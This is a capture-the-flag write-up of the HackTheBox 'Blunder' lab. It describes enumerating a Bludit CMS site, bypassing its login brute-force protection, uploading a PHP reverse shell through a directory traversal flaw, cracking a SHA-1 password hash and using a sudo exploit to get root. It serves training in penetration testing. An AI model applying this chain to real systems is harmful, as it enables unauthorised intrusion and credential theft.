Blunder 10.10.10.191
Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Last updated
Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Last updated
Blunder is a Linux machine from HackTheBox, which is a real-life similar box that required CVE exploit technique, for training your ethical hacking and penetration testing skills.
After basic enumeration, this Linux server is a web application develops using the blunder CMS running on port 80. Using the tool Drib, some hidden files are found which contain a possible user name "fergus", and a Bruteforce protected admin login page also identifies.
After google, I find that the Bruteforce protection of this version blunder CMS can be bypassed. Get the administrative privilege account. I am trying to upload PHP reverse shell to the site via the provided image uploaded function, uploaded success but fail to get the access path. Google again, there is a CVE exploit on the Bludit that related to the directory traversal. Follow the instruction, get the low privilege access.
The system is enumerated, there is a newer version of Bludit CMS is found and a file-based user account database is identified. There is an SHA-1 hashed password of a user account hugo. Crack the password using an online tool and get this user account access.
Enumerate the system again with a tool - linpeas, the sudo version have PE vulnerability. Following the exploitDB instruction, get the root access finally.
130n@calvinlai.com
Target Machine: 10.10.10.191
Attacker Machine: 10.10.14.16
Enumeration Strategy
Only port 80 open, focus on the web application and check any CVE vulnerability.
Using the following tools, a folder and two files are found, /admin/, /robots.txt, and /todo.txt
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
dirb http://10.10.10.191/ /usr/share/wordlists/dirb/common.txt -o dirb-191.result
gobuster dir -u 'http://10.10.10.191/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result
python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.191/ -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result
/robots.txt
/todo.txt
/admin/
The source code of the login portal shows that it builds by the Bludit CMS and version is 3.9.2 and /todo.txt hints of a user fergus
.
Brute forcing is not a simple task as the site is implemented the CSRF token, and after 10 login attempts my IP address being blocked. Next steps, I am going to search for any vulnerable of this bludit version and this blog is found.
I am failure by using the rockyou.txt as the password list to gain the website login access, but, it is success using cewl to gathering the wordlist from the site.
Enumerated the system after got the login access, there is an image upload function. A PHP reverse shell file and ".htaccess" can be bypassed the client-side validation and uploaded to the server successfully. But the file access path cannot be found.
After searching on the exploit database, there is a CVE vulnerability on Bludit 3.9.2 that related to the directory traversal. The PoC scripts show that the UUID can be used to control the result access path.
As the upload validation only applies on the client-side, thus, using the burp to change the upload parameters (value of filename), the PHP reverse shell and the.htaccess
files are uploaded to the /tmp/
folder. I can execute the reverse shell PHP by visiting the http://10.10.10.191/bl-content/tmp/reverse.php
Finally, the initial web server account privilege access is obtained.
The system file shows that this bludit CMS setup to use the file-based database, three hashed password are found at users.php of two bludit folders. According to the official website for recovery the admin password file, this hashed password is in SHA-1 format. Using the online tool to decrypt the hashed password. The password for hugo account obtains which is Password120.
I find that Hugo reuse his password reuse on their system account. Let's spawn a PTY shell, as this will allow us to use the su command. The low privilege user account obtain.
Download the linpeas.sh to study the environment search for possible paths to escalate privileges on Linux hosts. The result shows the sudo version of this system is one of the possible paths to escalate privilege.
Searching the exploit db again, there is a CVS exploit on this sudo version is identified. Following the instruction, the root privilege obtain.
Missing patches are very common in the real-life system, we need to keep the system patches are updated to avoid know attack.
https://rastating.github.io/bludit-brute-force-mitigation-bypass/ https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php https://md5decrypt.net/en/Sha1/ https://www.exploit-db.com/exploits/47502